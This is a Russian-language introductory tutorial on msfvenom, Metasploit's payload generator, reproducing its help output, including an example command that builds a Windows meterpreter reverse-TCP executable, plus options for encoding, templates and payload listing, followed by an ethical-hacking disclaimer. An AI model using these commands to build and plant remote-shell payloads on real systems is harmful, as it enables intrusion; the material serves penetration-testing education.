Методы эксплуатации Metasploit и полезные нагрузки || Создание полезной нагрузки с помощью msfvenom
MSFvenom позволяет быстро генерировать пользовательские полезные нагрузки Metasploit «на лету» прямо из терминала.
Для выполнения этого руководства вам потребуется установленная копия Metasploit. Metasploit уже установлен по умолчанию в Kali Linux; если вы ещё не установили Kali, ознакомьтесь с моим руководством по установке Kali Linux в Virtualbox.
Если вы используете другой дистрибутив Linux, скачайте быстрый установщик 7s Nightly здесь.
Параметры -h
Как и в случае с любой новой программой для Linux, давайте начнём с изучения файла справки по msfvenom. Для этого введите msfvenom -h в терминале.
root@Kali:~# msfvenom -h
MsfVenom — автономный генератор полезных нагрузок Metasploit.
Также является заменой msfpayload и msfencode.
Использование: /usr/bin/msfvenom [параметры]
Пример: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.exe
Параметры:
-l, --list Вывести список всех модулей для [тип]. Типы: полезные нагрузки, кодировщики, nop-пакеты, платформы, архитектуры, шифрование, форматы, все
-p, --payload Используемая полезная нагрузка (--list полезные нагрузки для вывода, --list-options для аргументов). Укажите «-» или STDIN для пользовательских настроек.
--list-options Вывести стандартные, расширенные и обходные параметры --payload.
-f, --format Формат вывода (используйте --list formats для вывода списка).
-e, --encoder Используемый кодировщик (используйте --list encoders для вывода списка).
--sec-name Новое имя раздела, используемое при генерации больших исполняемых файлов Windows. По умолчанию: случайная строка из 4 букв
--smallest Сгенерировать минимально возможную полезную нагрузку, используя все доступные кодировщики
--encrypt Тип шифрования или кодировки для шелл-кода (используйте --list encrypt для вывода списка)
--encrypt-key Ключ для --encrypt
--encrypt-iv Вектор инициализации для --encrypt
-a, --arch Архитектура для --payload и --encoders (используйте --list archs для вывода списка)
--platform Платформа для --payload (используйте --list platform для вывода списка)
-o, --out Сохранить полезную нагрузку в файл
-b, --bad-chars Символы, которых следует избегать, например: '\x00\xff'
-n, --nopsled Добавить nopsled размером [длина] к полезной нагрузке
--pad-nops Использовать размер nopsled, указанный параметром -n, как общий размер полезной нагрузки, автоматически добавляя nopsled размером (nops минус длина полезной нагрузки)
-s, --space Максимальный Размер результирующей полезной нагрузки
--encoder-space Максимальный размер закодированной полезной нагрузки (по умолчанию - значение -s)
-i, --iterations Количество раз кодирования полезной нагрузки
-c, --add-code Указать дополнительный файл шеллкода win32 для включения
-x, --template Указать пользовательский исполняемый файл для использования в качестве шаблона
-k, --keep Сохранять поведение --template и внедрять полезную нагрузку как новый поток
-v, --var-name Указать имя пользовательской переменной для использования в определенных форматах вывода
-t, --timeout Время ожидания в секундах при чтении полезной нагрузки из стандартного ввода (STDIN) (по умолчанию 30, 0 для отключения)
-h, --help Показать это сообщение
Полезные нагрузки
Генерация полезной нагрузки в Metasploit — это одна из его волшебных особенностей, позволяющая создавать пользовательскую полезную нагрузку для выхода из практически любой ситуации.
В Metasploit слишком много различных типов полезной нагрузки, чтобы перечислять их все здесь; Но вы можете сами проверить их, введя команду msfvenom -l payloads, чтобы получить список всех полезных нагрузок в терминале.
msfvenom -l payloads
Прежде чем мы погрузимся в создание нашей полезной нагрузки, нам необходимо изучить различные типы полезной нагрузки, которые вы увидите в списке.
Отказ от ответственности:
Это видео предоставлено исключительно в образовательных и информационных целях. Мы считаем, что каждый должен знать об этичном хакинге и кибербезопасности, чтобы избежать различных видов кибератак на компьютеры, веб-сайты, приложения и т. д. Пожалуйста, воспринимайте слово «хакинг» как «этичный хакинг» каждый раз, когда мы его используем.
Все наши видео сняты с использованием наших собственных систем, серверов, маршрутизаторов и веб-сайтов. Они не содержат никакой незаконной деятельности. Наша единственная цель — повысить осведомленность о кибербезопасности и помочь нашим зрителям узнать, как защитить себя от любых хакерских атак. Cyber Technical Knowledge не несет ответственности за любое неправомерное использование предоставленной информации.
Информация по комментариям в разработке